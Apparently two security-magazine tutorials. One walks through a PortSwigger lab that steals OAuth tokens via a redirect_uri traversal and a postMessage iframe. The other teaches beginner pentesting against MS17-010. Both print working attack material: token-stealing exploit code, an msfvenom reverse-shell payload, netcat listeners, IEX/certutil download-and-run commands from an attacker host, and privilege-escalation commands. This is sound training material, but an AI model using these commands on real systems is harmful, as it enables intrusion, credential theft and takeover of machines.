This tutorial is a walkthrough to the lab “Stealing OAuth access tokens via a proxy page” from Web Security Academy by
PortSwigger. The level of this lab is expert, and the reader should have a basic understanding of HTML and JavaScript. It is
also recommended that the topic “OAuth 2.0 authentication vulnerabilities” has been worked through to this point. This lab
can be solved with the community edition of Burp Suite, no professional version is needed. You should have configured
your browser and Burp Suite so that you can intercept the traffic. In the reference section is a link where you can find
information about browser configurations.
SOLVING THE LAB
Preparation
Before you can start solving the lab, you must create an account at the Web Security Academy. After successful creation,
you can access the lab by clicking the button “Access the lab” at the bottom of the lab site.
Figure 1: Access the lab
The blog should look like the following figure. Because the order of the blog posts varies, when you access the lab, it can
happen that you see another blog post at the top. At the time of writing, the blog entries were always the same. If there are
still other blog entries, this is not a problem, because the source code has not changed.
153
Figure 2: The First Blog Post
At this point, you should configure your Burp Proxy to intercept the traffic. For that, open the “Proxy” tab and then the
“Intercept” tab, activate the button “Intercept is on”. If you use a plugin like FoxyProxy, enable the configured connection
for your Burp Suite. The next figure shows the Burp Proxy configuration.
Figure 3: Configure Burp Proxy
Identify a useful Vulnerability
At the blog page, click the link “My account” in the upper right. You will be redirected to a login form, where you must put
in the username “wiener” and the password “peter”. You will find these credentials at the lab site.
154
Figure 5: My Account
After you type in the credentials and click the button “Sign-in”, you are redirected to a website where you must authorize
the application. Here, the only task is to click the “Continue” button. After that, the application has access to your profile
and your mail address. You will be redirected to the start page of the blog.
The next step is to open the HTTP history in Burp Proxy. Click the “Proxy” tab and the “HTTP history” tab. Your “HTTP
history” tab should look like the following figure. Of course, the host names are different than your host names.
Figure 6: HTTP History
You should study the whole OAuth flow and take a closer look at the GET request to the endpoint
/auth?client_id[..]. Send this request to Burp Repeater. You do this by right clicking in the „Request“ section and
selecting the option „Send to Repeater“. After that, switch to Burp Repeater.
Figure 7: Send The Request To Burp Repeater
155
In Burp Repeater, you see the GET request in the „Request“ section. This request contains the following OAuth parameters:
• client_id: Unique identifier of the client application.
• redirect_uri: URL to which the user's browser should be redirected.
• response_type: Kind of response the client application is expecting.
• scope: User's data the client application wants to access.
There is another parameter named nonce and the value of that parameter must be used in the exploit code. Do not be
confused about the nonce parameter, it seems to be like the state parameter but they serve different purposes. To explain
the difference between these purposes is out of scope of the tutorial. There is a link in the reference section, where you can
find more information.
Figure 8: GET Request in Burp Repeater
Normally, you should probe any OAuth parameter within the URL. But to save some time, we will concentrate on the
redirect_uri parameter. Many OAuth attacks are based on exploiting flaws in the validation of this parameter. Your
redirect_uri parameter should look like the following: redirect_uri=https://YOUR-LAB-ID/oauth-callback.
If you delete the part oauth-callback from the URL and send the request to the application, you will receive an
HTTP/1.1 400 Bad Request. But if you append the following sequence /../.. to the URL, you will receive an HTTP/1.1
302 Found. That means, the redirect_uri parameter is vulnerable to directory traversal. This enables you to redirect
access tokens to arbitrary pages on the blog website.
156
Figure 9: 400 Bad Request
Figure 10: 302 Found
157
Continue to inspect
Now, audit the other pages on the blog website. Open a post and send a comment to that post. Switch to Burp Proxy and
open the „HTTP history“ tab. Take a look at the GET request to the endpoint /post?postId=<ANY_NUMBER>. In the
„Response“ section within Burp Proxy, scroll down to the comment section. Almost at the end of the HTML code, you will
notice an iframe tag. The comment form is included as an iframe tag.
The iframe tag
An iframe tag embeds another HTML page into the current one and represents a nested browsing context. Each browsing
context has its own session.history and document. In fact, every iframe in a page requires increased memory and
other computing resources.
Figure 11: Leave A Comment
Figure 12: Comment Form In Iframe Tag
Take a closer look at the GET request to the endpoint /post/comment/comment-form. In the „Response“ section within
the „HTTP history“ tab, you will notice that at the top of the <body> section a <script> tag is included. You see a
158
postMessage() method that sends the window.location.href property to its parent window. The
window.location.href property contains the entire URL. The second parameter (*) of the postMessage() method
allows messages to be posted to any origin.
The postMessage() method
The postMessage() method enables cross-origin communication between Window objects. For example, between a page
and an iframe embedded within it. Normally, scripts on different pages are not allowed to access each other. This access is
prevented by the same origin policy (SOP). The use of postMessage() provides a controlled mechanism to securely
circumvent this restriction. The syntax looks like:
• targetWindow.postMessage(message, targetOrigin, [transfer]);
• targetWindow: A reference to the window that will receive the message.
• message: Data to be sent to the other window.
• targetOrigin: Specifies what the origin of targetWindow must be for the event to be dispatched. You should
always provide a specific targetOrigin, not „*“.
• [transfer]: It is an optional parameter.
Figure 13: PostMessage Method
prepare the exploit
In the „HTTP history“ tab, right click on the GET request to the endpoint /auth?client_id=[..] and select „Copy
URL“. Open your preferred editor and paste the URL.
159
Figure 14: Copy URL
Switch to your browser and click the button „Go to exploit server“. At the exploit server, you have three sections, named
File, Head and Body. In the File section, you can specify a file name. Leave this as it is. In the Head section, you can add
additional HTTP headers. This is not necessary in this lab. The last section is the Body section. Here, we must insert our
exploit code.
Figure 15: Sections in Exploit Server
160
The first part of our exploit code is an iframe that should look like the following.
<iframe src="https://YOUR-LAB-AUTH-SERVER/auth?client_id=YOUR-LAB-CLIENT_ID&redirect_uri=h
ttps://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/comment/comment-form&re
sponse_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe>
You see in the src attribute that we use directory traversal (/../) to change the redirect_uri so that it points to the
comment form. There are some parts in the URL that depend on your lab instance. The following list will show you where
you find this information.
• YOUR-LAB-AUTH-SERVER: The value of the host header in the GET request to the endpoint
/auth?client_id=[..].
• YOUR-LAB-ID: That is the address of your lab instance. Switch to your browser and click the “Home” link in the
upper right, then copy the address from the address bar.
• YOUR-LAB-CLIENT_ID: The client_id is in the same GET request where you find the
YOUR-LAB-AUTH-SERVER value.
The second part of our exploit code is a script tag with some JavaScript in it. The next few lines will explain the JavaScript
in more detail.
<script>
window.addEventListener('message', function(e) {
fetch("/" + encodeURIComponent(e.data.data))
}, false)
</script>
The addEventListener() method
The EventTarget method addEventListener() sets up a function that will be called whenever the specified event is
delivered to the target. The first parameter is a string representing the event type, in this case ‘message’. The second
parameter is the listener, this must be an object implementing the EventListener interface, or a JavaScript function. In
this case, it is a function where the fetch method is used to fetch encoded event data. The third parameter is optional.
The fetch method
The fetch() method belongs to the Fetch API and provides an easy, logical way to fetch resources asynchronously across
the network.
161
This JavaScript reveals the web message in the exploit server's access log. Your Body section should similarly look like the
following figure. Please keep in mind that the URLs may look different in your lab.
Figure 16: Finished Exploit
solve the lab
We must check that the exploit is working, store it and then click the button “View exploit” under the Body section. An
iframe should appear in which the comment form is displayed.
Figure 17: The Comment Form in Iframe
Click the back button in your browser and if you are back at the exploit server, click the button “Access log” under the Body
section. The server log will open, and you see some GET and POST requests. Look for a GET request in which you find the
full URL of the comment form. In this request, you also see an access token.
Figure 18: Access Log
Click the back button in your browser to return to the exploit server and click the button “Deliver exploit to victim”. Click
the button “Access log” again and look for a GET request like that we saw one step earlier but this time, there is a different
IP address. In this request, extract the value of the parameter access_token but be careful that you only extract the value
and not the URL encoded characters which enclose this value.
162
Figure 19: Access Token
Switch to Burp Proxy and open the “HTTP history” tab and look for a GET request to the endpoint /me. In the request
section of Burp Repeater, right click and select the option “Send to Repeater”.
Figure 20: Send Request To Repeater
Switch to Burp Repeater and look in the request section for the authorization header. Replace the value of the header
behind the word Bearer with the access token that you copied from the access log. Your authorization header should look
like Authorization: Bearer <YOUR-COPIED-ACCESS-TOKEN>.
Figure 21: Authorization Header
If you send the request to the blog website, your response will contain the JSON data from the administrator user.
163
Figure 22: JSON Data
To solve the lab, copy the value of the apikey and switch to your browser. In the upper middle of the blog website, you see
a button name “Submit solution”.
Figure 23: Submit Solution
If you click on it an input field appears, and you can paste the value from the apikey from your Burp Repeater. Now, you
can hit enter and you solved the lab. If you did not see the lab solved banner, refresh your browser and everything should be
fine.
Figure 24: Lab Solved
164
CONCLUSION
The expert labs of the Web Security Academy are very difficult and in most cases, the understanding of the topic is not
enough to solve these labs. This lab requires only a basic understanding of HTML and JavaScript, as I explained in the
introduction. Of course, it is hard to decide what is basic and what is advanced knowledge but as a Bug Bounty Hunter or a
Pentester, it is unavoidable to have an understanding of postMessage() and the Fetch API. The difficulty of this lab was the
identification of a second vulnerability and the identified vulnerability was directory listening. As you can see, you should
have worked on the topic Directory Listening so that you can apply the knowledge here. If you followed the learning path,
identifying this vulnerability was not easy, but it was not unnecessarily difficult either. Sometimes, it is also helpful to work
through the labs as they appear in the topic because the solution of the previous lab could be a good start at solving the next
lab. The Web Security Academy is one of the best free resources for web security on the Internet and you should work
through the whole learning path once, and then selectively as necessary.
References
1. Lab site:
https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-
proxy-page
2. Configure Burp Suite and Browser:

https://portswigger.net/burp/documentation/desktop/getting-started/proxy-setup/brows
er
3. Nonce vs state:
https://stackoverflow.com/questions/46844285/difference-between-oauth-2-0-state-and-
openid-nonce-parameter-why-state-cou
4. What is directory traversal: https://portswigger.net/web-security/file-path-traversal
5. Iframe: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
6. Window.postMessage():
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
7. Location: https://developer.mozilla.org/en-US/docs/Web/API/Location
165
HACKING
TECHNIQUES FOR
BEGINNERS: HOW
TO GET THE
CONTROL OF A
SYSTEM
VERÓNICA BERENGUER
GARRIDO
I'm Verónica Berenguer Garrido, graduate in telecommunications
engineering and specialized in the branch of cybersecurity by the University
of Seville.
Nowadays, I work as an offensive security researcher in a Red Team, which
allows me to analyze all kinds of vulnerabilities and exploit them. This helps
me protect systems and networks from threats and malware.
My passion is to learn more every day and research new technologies that
allow me to improve in my work.
In short, I love what I do.
167
Hacking Techniques For Beginners: How To Get The Control Of A System
When we hear the word “hacker” we usually imagine a person that wears a black hooded sweatshirt doing illegal activities
in a sinister terminal. However, this is not always the case because there is a big difference between cybercriminal and
hacker.
A hacker is a role that has knowledge of hacking techniques. Now, we can differentiate between ethical hackers and
cybercriminals. Both have the same hacking knowledge, however, the first uses them to find vulnerabilities and report them
to improve systems and applications, while the second pretends to obtain some benefit, such as economic compensation,
extortion, etc.
In this article, we are going to learn basic hacking processes and techniques to be an ethical hacker, from port scanning to
privilege escalation. Finally, we will see with a real example how we can hack a remote machine applying these techniques.
WHAT WILL YOU LEARN?
In this article, we will introduce the world of hacking, teaching all the steps to get control of a system.
The topics addressed are as follows:
Port Scanning
Vulnerability Scanning
Exploitation Tasks
Privilege Escalation
WHAT SHOULD YOU KNOW?
In this article, we will explain everything step by step, but the following prior knowledge will be necessary:
Basic Scripting (Python, C, Bash, Perl, PHP, etc.)
Basic Networking
You just need to have fun reading, learning and researching.
INTRODUCTION
Nowadays, any person interested in cybersecurity is called a hacker, but really the value of a hacker isn’t just to launch
automatic applications to find and exploit vulnerabilities. The real value of a hacker is the knowledge of techniques or basic
tools or commands to research vulnerabilities and exploit them in systems and applications to improve them. The
automatic tools can help or complement the investigation, but wisdom is the most precious treasure of an ethical hacker.
168
With this article, we hope to foment and teach beginners basic techniques to start in ethical hacking. We can see how, with
a few commands, patience and calm, we can get a server in four phases, explained in the sections below. To apply this
knowledge, we are going to hack a machine using a Kali Linux distribution.
Before starting, I would like to remind you that you must have the permission of an organization or entity to hack it.
Normally, a company pays for pentesting their assets to patch the vulnerabilities before an authentic attacker hacks them.
So, in this article, pretend you are a pentester and you have to perform a security test to an organization. Let’s go there!
PORT SCANNING
The first step, called port scanning, is the process of checking for open TCP or UDP ports on a remote machine to find
services, technologies and versions.
NMAP
One of the most popular and complete tools for port scanning is Nmap (Network Mapper). Nmap is an open source and free
utility for security auditing and network discovery, which gets us a large amount of information about the computers, like open
and filtered ports, which hosts are up in a network, traceroute, operating system, services and versions by banner grabbing
and dozens of other characteristics. For the analysis, you can assign to Nmap a subnet, a single IP or a domain, such as we can
see below.
Besides, Nmap allows us to write and execute scripts named as Nmap Scripting Engine (NSE) in order to detect or exploit
vulnerabilities, enumeration tasks, backdoor detection, network discovery, etc.
Nmap has a very long list of options. Below, we are going to show the most efficient commands to obtain the necessary
information for our pentesting:
● -v
o This option shows the verbose of the application’s execution (only if you want to see the scanning’s advance).
● -A
o This option, named “aggressive scan options”, enables OS detection (-O), version scanning (-sV), script
scanning (-sC) and traceroute (--traceroute).
● -p
o This option is used to indicate the scanning ports. By default, Nmap scans the 1000 most popular ports on a
given machine for UDP or TCP. There are three options:
▪ If you want to scan all ports you can include the following option:
169
● -p-
● -p 0-65535
▪ If you want to scan specific ports you can include the following option, for example:
● -p 443,8451,80,25
▪ If you want to scan default ports, you must not include the option.
● -sU
o This option is used to scan UDP ports. If you don’t specify this, Nmap will scan TCP ports.
● -sT
o This option is used to scan TCP ports. By default, Nmap scans TCP ports, so this option is really unnecessary.
● -f
o This option is used to fragment packets and make it difficult for scan detection by firewalls or other intrusion
detection systems. Thanks to this option, Nmap can bypass the packet inspection of firewalls.
● -Pn
o This option is used to avoid ping. It is a good option because there are machines that filter or block ICMP
requests and may seem down to a ping sweep.
● --scripts
o This option is used to run a script scan. Normally, NSE scripts can be found in the /usr/share/nmap/scripts
directory.
● -oG
o This option is used to save the results in a txt file.
● -oX
o This option is used to save the results in an xml file.
In this article, we are going to apply the learned knowledge in a real example to hack a machine, since port scanning can
lead to privilege escalation.
170
The first step to hack a network is looking for active hosts. So, we are going to apply Nmap to obtain this information and
save it into a file. Thanks to the ‘grep’ and ‘cut’ commands, we can get only the lists of IPs into the file.
nmap -v -sn -n 192.168.1.0/24 | grep -v down | grep report | cut -d" " -f5 >
ips-192.168.1.0-up.txt
Once we have the list of machines that are up, the second step is scanning ports in machines. We can create ‘for’ and ‘do-
done’ control structures and execute directly to the terminal.
for i in $(cat ips-192.168.1.0-up.txt); do nmap -v -A -p- $i -oN ip-$i-tcp.txt; done
However, in this article we are going to perform the example with only one machine. To do this, the first step is TCP and
UDP port scanning in the target machine executing the following Nmap commands.
nmap -v -A -p- -Pn 192.168.1.40 -oX 192.168.1.40.xml
nmap -v -A -sU -p- -Pn 192.168.1.40 -oX 192.168.1.40.xml
1.1 Nmap port scanning
171
1.2 Nmap port scanning
We can see in this image a list of TCP ports open, its services, versions and the output of some NSE scripts related to the
services found. In the next section, we continue investigating these services to find related vulnerabilities.
Apart from Nmap, there are shell scripts based on Nmap such as nmapAutomator or autoRecon. Both are Linux shell scripts
that automate Nmap scanning tasks. They include different scan modes, including scanning for vulnerabilities, and
integrate additional tools to improve and complete the analysis according to the services found. For example, if it detects
web services, tools related to it are launched, such as Gobuster or Nikto. Both nmapAutomator and autoRecon are easy to
install and use, so I encourage you to use them.
VULNERABILITY SCANNING
Once you have discovered services, technologies and versions running on a machine, the next step is to find related
vulnerabilities, known as vulnerability scanning.
Vulnerability scanning is the process of discovering and identifying vulnerabilities in a network. The CVE (Common
Vulnerabilities and Exposures) system identifies all threats and vulnerabilities related to a system’s security, assigning an
unique identifier to each vulnerability. A great CVE repository is located in https://cve.mitre.org/.
There are a lot of automatic tools that help the pentester in this phase, but most of them require payment or the free
options are quite limited. However, there are some powerful and free tools in the market that are helpful for this phase,
indicated below:
Nessus
This is a remote security scanning tool, developed by Tenable, for analyzing vulnerabilities into subnets, single IPs or webs
and it is free. Some of its characteristics are:
172
• Multiplatform
• Supports the Common Vulnerability Scoring System (CVSS) and its v2/v3 versions.
• This tool has number IP limitations in internal networks but without limits for public IPs.
• It is a good option for system analysis.
OpenVAS
This tool is an open-source vulnerability scanner that can perform authenticated and unauthenticated scans utilizing more
than 80,000 vulnerability tests and is free. It is similar to Nessus.
OWASP Zed Attack Proxy (ZAP)
This free tool is an open-source web application vulnerability scanner and it has proxy functionality. It is similar to Burp
Suite (payment tool) and it is based on OWASP Top 10 to check common web security vulnerabilities. Some of its
characteristics are:
• Multiplatform
• Passive and active analysis
• Fuzzing Mode
• Spidering Mode
• Debugging
However, in this lesson, we are going to learn how to get vulnerabilities without automatic tools. For that, our greatest ally
is Nmap.
As we saw previously, Nmap can execute NSE scripts dedicated to enumeration tasks or detect and exploit vulnerabilities.
To do this, first Nmap finds services, technologies and versions. With that information, Nmap is able to search CVE related
to the version found and show it to the pentester.
Finding vulnerabilities with NSE Scripts
By default, Nmap has a script named vuln to search for vulnerabilities. However, the most popular vulnerability detection
NSE scripts are vulscan and vulners, which will enable you to detect relevant CVE information from hosts. To install and use
them follow the steps of the links and remember that, normally, all NSE scripts can be found in the
/usr/share/nmap/scripts directory.
173
Examples to searching vulnerabilities with NSE scripts are shown below:
nmap -v -A --script vuln -p- -Pn 192.168.1.40
nmap -v -A --script vulners -p- -Pn 192.168.1.40
nmap -v -A --script vulscan -p- -Pn 192.168.1.40
Besides NSE scripts for scanning vulnerabilities, there are a lot of NSE scripts dedicated to multiple services, such as HTTP,
SNMP, SMTP, FTP, etc., to enumeration tasks, scanning and exploiting vulnerabilities. I encourage you to discover the
most interesting scripts and use them.
2 Abstract of NSE scripts
In our target machine, we are going to use scanning vulnerabilities NSE scripts to find vulnerabilities. To do this, we
execute the following Nmap command, focusing on the ports found in the previous section.
nmap -v -p 139,145,445,49152,49153,49154,49155,49156,49157 --script vuln 192.168.1.40
174
3 vuln nmap script
We find a critical SMB vulnerability identified as ms17-010, whose objective is remote code execution in Microsoft SMBv1.
In the next section, we will exploit this vulnerability to get system control of the remote target machine.
EXPLOITATION TASKS
Once we have identified the vulnerabilities of the services found in a target machine, the next step is to exploit the
vulnerabilities to get access to it. To do this, the pentester has to search exploits related to the found vulnerabilities. An
exploit is, basically, a piece of code written to take advantage of a particular vulnerability.
This is the most important phase because you must perform a full investigation to discover the effective exploitation
method to gain access to a machine. You must be very patient and keep calm because this could take a very long time.
Searching exploits
One of the most popular and reliable repositories for public exploit code is Exploit Database. These exploits are uploaded
under close examination, and they are not published if deemed fake.
For searching, we have two options:
• Manual
For this option, we can visit https://www.exploit-db.com/ and search exploits related to the CVE found in the
vulnerability scanning phase.
• Automatic
For this option, Kali Linux has installed the tool named searchsploit. This is a command line search tool based on
exploit-db repository that takes a copy of the available exploits and saves them in the machine where you execute the
175
analysis, so it is important that you update this repository frequently. You can visit
https://www.exploit-db.com/searchsploit to install and learn a more advanced usage of this tool.
The most basic and efficient options of searchsploit are shown below, though I encourage you to discover all the
options for this tool with --help:
o Updating searchsploit:
searchsploit -u
o Search exploits:
searchsploit <ServiceName>
o See the description of an exploit:
searchsploit -x <ExploitName>
o Take a copy of an exploit to the current working directory:
searchsploit -m <ExploitName>
o Checking all exploit results in Nmap's XML output with the service version.
▪ First, we execute the vulnerability searching with Nmap. The output must indicate service version
(option -A):
nmap -A <targetMachineIP> -oX ResultsNmap.xml
▪ Secondly, we can obtain exploits automatically using as input the xml file with the results of Nmap. To
do this, searchsploit reads the services and versions of the document and it will perform the related
exploits search.
searchsploit --nmap ResultsNmap.xml
It is important that you know that you will never run an exploit without first examining its code and understanding its inner
workings. So, in this phase you need basic scripting knowledge to customize and fix exploits, such as Python, Bash, Ruby,
Perl, C, C++, etc.
If you are not familiar with scripting practice and you are beginning in ethical hacking, I recommend you begin with
Metasploit Framework.
Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code written in Ruby.
Kali Linux distribution includes this framework, but if you have another platform, you can follow the steps to install it in
this guide: https://github.com/rapid7/metasploit-framework.
176
Metasploit includes a lot of auxiliary modules that provide functionality such as information gathering, port scanning,
protocol enumeration, fuzzing, sniffing, etc. Apart from that, it also includes an important repository of exploits. Thanks to
this tool, you can get a system in a few and simple commands, configuring the exploit without inspecting or understanding
the code.
The intention of this article is not to see automatic tools, so we will not focus on this application. However, I encourage you
to learn more about this indispensable tool for any ethical hacker through this great tutorial
https://www.offensive-security.com/metasploit-unleashed/.
In our hacking machine, the following step is searching exploits related to the found vulnerabilities, so we are going to use
exploit-db web repository and its command line tool searchsploit to do this.
Exploit-DB
We find exploits related to CVE ID. We can review them and download for its use.
4.1 Exploit-DB Seach
4.2 Exploit-DB Seach
177
Searchsploit
We find exploits related to the ms17-010 vulnerability ID and we take a copy in our current directory with -m option.
5 Searchsploit
To gain access into the target machine, we have to review the script to understand its operation mode and modify the
necessary options. Normally, every script has a description at the beginning to explain its modules and options to configure
them.
Creating a payload
A payload is a piece of code located in the exploit to exploit the vulnerability and gain access into the target machine. The
most popular tool to create payloads is msfvenom. To understand better the creation of payloads, I encourage you to
investigate and learn more about this tool in https://www.offensive-security.com/metasploit-unleashed/msfvenom/.
For this example, we will use it to create a shell reverse tcp payload in an executable output.
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=192.168.248.140 LPORT=4444 -f exe -o

eternal-blue.exe
The options are explained below:
• - p <payload>
• -f <type>
• LHOST <attacker_IP>
• LPORT <listen_port_attacker_ip>
• -o <executable_name>
178
6 Msfvenom payload creation
It has been generated as an executable that it will be executed in the target machine when we run our exploit. This payload
will connect with our hacking machine (192.168.248.140) through the port 4444 to create a reverse shell terminal with the
victim machine.
Running the exploit
In this case, next we indicate the path of the payload into the exploit.
7 Configuring the exploit
As the target machine will try to connect with our hacking machine through the port 4444, we will listen in that port.
nc -nvlp <LISTEN_PORT>
8 netcat listening port
Finally, we run the exploit and we get the session remote with the target machine.
179
9 Exploit running
10 Connection successful with the target machine
The general idea for this section is that once we have found interesting exploits, we have to execute them to try to get access
to the system. Be patient and keep calm, it is possible that vulnerabilities found are patched and its exploits do not work, so
you will have to keep looking and testing exploits.
PRIVILEGE ESCALATION
Once you have successfully exploited a vulnerability and you have access to a remote machine, we enter into the last phase:
privilege escalation.
Privilege escalation is the process of increasing the level of access to a machine or network, therefore, the objective is to get
root users. In this section, we will see interesting tips and methods acquired with experience to search the way to elevating
privileges in a machine for Windows and Linux.
File Transfer Method
One of the first steps to take after gaining a remote shell is to upload additional tools to the remote machine to escalate
privileges. However, we are limited to only using tools that are available on the target. Below we are going to learn some
methods to transfer files into the target machine.
180
First, in our hacking machine we listen through an HTTP port, for example port 80, but you can listen into any port you
want. To do this we can use Python, in our case Python 2.7. The following command will be executed into the directory
where the files you want to transfer are stored.
python2.7 -m SimpleHTTPServer 80
Also you can use apache if you prefer. To do this, we put the files we want to transfer into /var/www/html and then we start
apache service.
service apache2 start
Once we have a service HTTP listening into any port on our hacking machine, we can download the file into the victim
machine with one of these processes.
1. Advanced Techniques
• Linux Victim Machine
Next, from the victim machine, we first corroborate if the target machine has wget or curl installed. If the output of
the following command indicates the path of the application, it means that the tools exist.
which wget; which curl
If the target has wget or curl installed on the machine, we can use one of these tools to download the file. First we
change into a directory that permits writing, such as /tmp. The commands are below.
• Wget
wget http://<ATTACKER_MACHINE>:<PORT>/<FILE_PATH>
• Curl
curl -o <FILENAME> http://<ATTACKER_MACHINE>:<PORT>/<FILE_PATH>
If it is an executable file, we check if it has executing permissions into the target machine and we provide it if
necessary.
• Windows Victim Machine
If the target machine is a Windows distribution, we can use certutil.exe to download the file from cmd or powershell:
181
• cmd
certutil.exe -urlcache -split -f “http://<ATTACKER_IP>:<PORT>/<FILE_PATH>" <FILENAME>
• PowerShell:
certutil -urlcache -split -f “http://<ATTACKER_IP>:<PORT>/<FILE_PATH>" <FILENAME>
If the target machine has not installed certutil, we can try with wget to download the file from cmd or PowerShell:
• cmd
powershell.exe wget http://<ATTACKER_IP>:<PORT>/<FILE_PATH> -outfile “<FILENAME>”
• PowerShell
wget http://<ATTACKER_IP>:<PORT>/<FILE_PATH> -outfile “<FILENAME>”
If the target machine has not installed the previous tools, we can try with IEX to download the file from cmd or
PowerShell:
• cmd
powershell.exe -c “(new-object System.Net.WebClient).DownloadFile(‘http://

<ATTACKER_IP>:<PORT>/<FILE_PATH>', ‘<WINDOWS_FILE_PATH_TO_SAVE_THE_FILE>’)”
• PowerShell:
IEX(new-object System.Net.WebClient).DownloadFile(‘http://<ATTACKER_IP>:<PORT>/
<FILE_PATH>', ‘<WINDOWS_FILE_PATH_TO_SAVE_THE_FILE>’)
2. Netcat
Another method to transfer files is Netcat. This is a tool capable of establishing UDP or TCP connections between
hosts.
To do this we first corroborate if the target machine has netcat installed and then we execute the following command
in our hacking machine. The following command will be executed in the directory where the files you want to
transfer are stored.
nc -nlvp <LISTEN_PORT> > <FILENAME>
• Linux Victim Machine
Once the server is listening, we can run the following command in the victim machine to download the file.
182
nc <ATTACKER_IP> <LISTEN_PORT> -w 3 < <FILENAME>
• Windows Victim Machine
If the distribution machine is Windows, we can run the following command in the victim machine to download the
file.
nc.exe <ATTACKER_IP> <LISTEN_PORT> -w 3 < <FILENAME>
Apart from these methods, there are a lot of processes you can try to transfer files, such as FTP protocol. I encourage you to
investigate some FTP tools as tftp or pureftp and practise them.
Once we have seen some methods to file transfer, we are going to search the way to elevate privileges in a machine for
Windows and Linux.
Linux Privilege Escalation Methods
Imagine you have access in a remote machine as a user without root privileges. Below, we are going to see, in order, the
steps to follow to escalate privileges in a Linux distribution.
1. Check the allowed commands for the invoking user on the current host
First, we will check with the sudo tool what commands the invoking user can launch as if it was another user. To do
this, we launch the following command.
sudo -l
This order lists the allowed commands for my user, as we can see below. The last line shows us that the user I am
running, in this case named www-data, can run all commands as the user scriptmanager without having to provide
its password.
11 Checking user permissions
If we execute one of the following commands, we will become scriptmanager user.
sudo -u scriptmanager bash -i
183
sudo -i -u scriptmanager
The same case can happen with a superuser as root. In the next example, we can see that the user named notch can
run all commands as any user.
Next we can see /etc/passwd file to find superusers counts as root, and execute the following command to become
root user:
sudo -u root bash -i
To corroborate this, we can launch whoami or id commands to check the running user.
13 whoami
Another example is the following, where we can see that we can launch Perl applications as root without any
password.
In this case, we can’t execute any command, but with our imagination we could become the root user, as we can see
below.
15 Get root user

2. Check setuid bit
184
If it is not possible to escalate privilege with the previous method, we are going to check the setuid bit.
The setuid bit allows us to execute a file with the creator's permissions. If this bit is activated, it will change the ‘x’ by
the ‘s’. Therefore, if the proprietary of an executable file is the root user and setuid bit is active, we could become the
root user temporarily.
First, we are going to locate the files that have setuid permissions with the following order.
find / -perm -u=s -type f 2>/dev/null
16 Files with setuid permissions
Next we look for executables files, like the first line. Inspecting this file, we can corroborate the setuid bit is active in
a root executable file.
17 Corroborating setuid bit
Our user belongs to the “others” permission group, so we can execute this file.
18 “Other” permission group
Finally we execute this file and, while the execution is active, we will be root.
19 Running file with setuid bit active
185
3. Bash Scripts Linux Exploit Suggester
If it is not possible to escalate privilege with the previous methods, we are going to see how to get it through Bash
scripts.
There are some Bash scripts dedicated to keep track of vulnerabilities and suggest possible exploits to use to gain
‘root‘ on a legitimate penetration test.
The most important Bash scripts are shown below.
• Linux exploit suggester
• LinEnum
• LinuxPrivChecker
In both cases, you can download a Bash script into the hacking machine and transfer it into the victim machine, as
we learned previously.
Once the Bash script is in the victim machine, the first step is to execute it. The output will show a list of possible
vulnerabilities and exploits to elevate privileges. This information is obtained after checking the characteristics of the
machine, as we can see in the image below. This is an example of the script linux-exploit-suggester execution.
20 Linux Exploit Suggester Execution
Our work from this point will be to try exploits to obtain elevation of privileges. Furthermore, as we can see in the last
image, the URL path of the exploits are shown, so you only have to download exploits into the victim machine and try them.
Our target machine is a Windows distribution, whereby in the next section we will see the example of how we can escalate
privileges in a remote machine.
186
Windows Privilege Escalation Methods
In this section, we will learn some methods to escalate privilege in Windows machines.
1. Windows Exploit Suggester
This is a Python script dedicated to comparing a target patch level against the Microsoft vulnerability database in
order to detect potential missing patches on the target. To do this, you can download the script into the hacking
machine and follow the steps described in its official github web. This tool will check the system information of the
target machine and will find associated vulnerabilities.
To use this tool, it requires the ‘systeminfo’ command output from the Windows victim machine in order to compare
it with the Microsoft security bulletin database and determine the patch level of the target host. Below we can see an
example of ‘systeminfo’ output in a Windows host. This output must be copied into a txt file, named as
‘systeminfo.txt’, for example.
21 Systeminfo output
Once we have saved that information into a file, we execute ‘windows-exploit-suggester.py’ into our hacking
machine. The database should be updated frequently, as we can see below.
22 windows-exploit-suggester updating
To run this tool we can execute the following command.

187
python2.7 windows-exploit-suggester.py –-database 2021-03-15-mssb.xls –-systeminfo

systeminfo.txt | grep Privi
The output will show a list of possible vulnerabilities and exploits to elevate privileges, where [E] shows exploits
located into exploit-db and [M] indicates Metasploit exploits. This information is obtained after checking and
analyzing the characteristics of the machine through the txt file.
23 windows-exploit-suggester running
Our work from this point will be to try exploits to obtain elevation of privileges. To do this, we download and execute
in the victim machine an exploit from exploit-db.
powershell.exe -c “(new-objectSystem.Net.WebClient).DownloadFile(‘https://
www.exploit-db.com/download/41020', ‘c:\Users\Public\Downloads\41020.exe’)”
24 windows-exploit-suggester running
To corroborate the privilege elevation, we can run the ‘whoami’ command.
25 whoami
2. PowerShell Scripts Execution
188
If it is not possible to escalate privilege with the previous methods, we are going to see how to get it through
PowerShell scripts. The most popular are shown below.
• Sherlock.ps1
• PowerUp.ps1
In both cases, you can download the PowerShell script into the hacking machine and transfer it into the victim
machine. To do this, first we listen by the HTTP port into our hacking machine in the directory where ‘sherlock.ps1’
is located.
python -m SimpleHTTPServer 80
Then, from the victim machine, we execute the following command to download and execute the module named
‘Find-AllVulns’ in Sherlock.ps1.
• PowerShell
IEX(New-Object Net.Webclient).downloadString(‘http://<ATTACKER_IP>:<PORT>/
Sherlock.ps1’);Find-AllVulns
• CMD
powershell.exe IEX(New-Object Net.Webclient).downloadString(‘<ATTACKER_IP>:<PORT>/

Sherlock.ps1’);Find-AllVulns
For the script named PowerUp.ps1, we execute the module named ‘Invoke-AllChecks’, as we can see below.
• PowerShell
IEX(New-Object Net.Webclient).downloadString(‘http://<ATTACKER_IP>:<PORT>/
PowerUp.ps1’);Invoke-AllChecks
• CMD
powershell.exe IEX(New-Object Net.Webclient).downloadString(‘<ATTACKER_IP>:<PORT>/

PowerUp.ps1’);Invoke-AllChecks
The output will show a list of possible vulnerabilities and exploits to elevate privileges, as we can see in the following
image.
189
26 PowerShell script output
However, you can find suggested exploits written in various languages, such as C or Python. In this case, you should
convert it to executable files, like exe.
